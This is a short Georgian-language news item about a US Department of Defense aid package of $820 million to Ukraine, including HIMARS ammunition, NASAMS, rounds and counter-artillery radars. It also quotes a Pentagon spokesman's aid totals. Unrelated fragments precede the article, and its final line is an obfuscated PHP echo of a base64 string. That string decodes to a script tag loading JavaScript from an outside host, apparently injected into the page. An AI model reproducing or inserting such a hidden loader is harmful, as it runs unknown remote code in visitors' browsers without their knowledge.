celsiusi
ავერსი შნაიდერი
აშშ-ს თავდაცვის დეპარტამენტი (DoD) უკრაინას დამატებით 820 მილიონი აშშ დოლარის დახმარებას გაუწევს. დახმარების პაკეტი მოიცავს საბრძოლო მასალას საარტილერიო სარაკეტო სისტემებისთვის (HIMARS). ასევე DoD უკრაინას სარაკეტო სისტემა (NASAMS)-ს, 150000-მდე ვაზნას, საარტილერიო საბრძოლო მასალას და ოთხ კონტრსაარტილერიო რადარს გადასცემს.
 
პენტაგონის პრესმდივან ტოდ ბრისილის განცხადებაში ნათქვამია, რომ  შეერთებულმა შტატებმა ბაიდენის ადმინისტრაციის პირობებში დაახლოებით 7,6 მილიარდი დოლარის დახმარება გაუწია უკრაინას. მათ შორის დაახლოებით 6,9 მილიარდი დოლარი 24 თებერვლიდან ანუ რუსეთის უკრაინაში შეჭრის დაწყებიდან. 2014 წლიდან კი შეერთებულმა შტატებმა 8,8 მილიარდ დოლარზე მეტი გაიღო უკრაინის უსაფრთხოებისთვის.
 
DoD აღიარებს, რომ მიდის მუშაობა, რათა შესაძლებელი გახდეს შეერთებული შტატების მიერ უკრაინის თანამედროვე საჰაერო თავდაცვის სისტემებით უზრუნველყოფა, რომელიც დაეხმარება უკრაინას თავი დაიცვას რუსეთის სასტიკი საჰაერო თავდასხმებისგან.
573
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");